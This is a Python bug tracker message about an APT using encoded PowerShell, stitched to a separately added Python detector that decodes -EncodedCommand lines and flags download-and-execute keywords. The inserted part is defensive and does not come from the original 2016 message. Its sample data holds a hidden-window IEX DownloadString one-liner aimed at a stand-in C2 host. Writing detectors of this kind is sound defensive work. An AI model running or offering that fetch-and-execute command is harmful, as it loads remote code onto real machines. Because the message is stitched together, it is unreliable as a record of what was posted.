
Author: Alexander Riccio
Recipients: Alexander Riccio, brett.cannon, paul.moore, steve.dower, theller, tim.golden, zach.ware
Date: 2016-07-02.13:59:57
SpamBayes Score: -1.0
Marked as misclassified: Yes
Message-id: <1467467997.95.0.703208782698.issue26137@psf.upfronthosting.co.za>
In-reply-to:
Content:
It's not just Stuxnet, as at least one other Advanced Persistent Threat uses that tactic. An APT (likely Russian intelligence) recently used encoded PowerShell to break into the Democratic National Committee: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

From that article:

> This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory.

(As a fun coincidence, they also used py2exe to distribute other modules, which is kinda like a separate interpreter using safe_exec)
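The quoted technique relies on the fact that an encoded PowerShell one-liner (`-EncodedCommand`, base64 over UTF-16LE) is opaque to anyone who only sees the raw process command line. The following is an added defender-side example, not code from this tracker message or from the CrowdStrike article: it decodes such command lines from constructed process-creation log entries and flags decoded scripts that contain download-and-execute keywords for analyst review. The flag spellings, keyword list, and sample log lines are assumptions made for this example, not a complete detection rule.

```python
import base64
import re

# PowerShell accepts unambiguous prefixes of -EncodedCommand; this list of
# spellings is an assumption for the example, not an exhaustive one.
ENCODED_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)

# Decoded-script patterns that warrant review: in-memory execution of content
# fetched over the network, as described in the quoted article (constructed list).
SUSPICIOUS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (r"\biex\b", r"invoke-expression", r"downloadstring",
              r"net\.webclient", r"frombase64string")
]


def encode_command(script):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64).
    Used here only to construct realistic sample log lines offline."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an -EncodedCommand payload,
    otherwise None (also None when the payload is not valid base64)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):          # flag needs a following token
        if ENCODED_FLAG.match(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:                     # binascii.Error is a ValueError
                return None
            # Odd-length or truncated payloads still decode with replacement chars,
            # so an analyst can see what survived instead of getting nothing.
            return raw.decode("utf-16-le", errors="replace")
    return None


def triage(cmdline):
    """Classify one process command line.
    Returns (verdict, decoded_script_or_None) with verdict in
    {"plain", "encoded-benign", "review"}."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return ("plain", None)
    if any(p.search(decoded) for p in SUSPICIOUS_PATTERNS):
        return ("review", decoded)
    return ("encoded-benign", decoded)


def scan_log(lines):
    """Triage every command line; returns a list of (line, verdict, decoded)."""
    return [(line, *triage(line)) for line in lines]


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_LOG_LINES = [
    "powershell.exe -NoProfile -EncodedCommand "
    + encode_command("Get-Process | Select-Object -First 3"),
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://c2.example.invalid/m.ps1')"),
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    for line, verdict, decoded in scan_log(SAMPLE_LOG_LINES):
        print(f"[{verdict:14}] {line[:60]}")
        if decoded:
            print(f"    decoded: {decoded}")
```

In a real deployment the input would be process-creation events (for example Windows Security event 4688 with command-line auditing enabled, or Sysmon process-creation events) rather than a hard-coded list, and the one-liner stored in the WMI repository would additionally surface through WMI event-subscription auditing, which this example does not cover.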
History
Date | User | Action | Args
2016-07-02 13:59:58 | Alexander Riccio | set | recipients: + Alexander Riccio, brett.cannon, theller, paul.moore, tim.golden, zach.ware, steve.dower
2016-07-02 13:59:57 | Alexander Riccio | set | messageid: <1467467997.95.0.703208782698.issue26137@psf.upfronthosting.co.za>
2016-07-02 13:59:57 | Alexander Riccio | link | issue26137 messages
2016-07-02 13:59:57 | Alexander Riccio | create |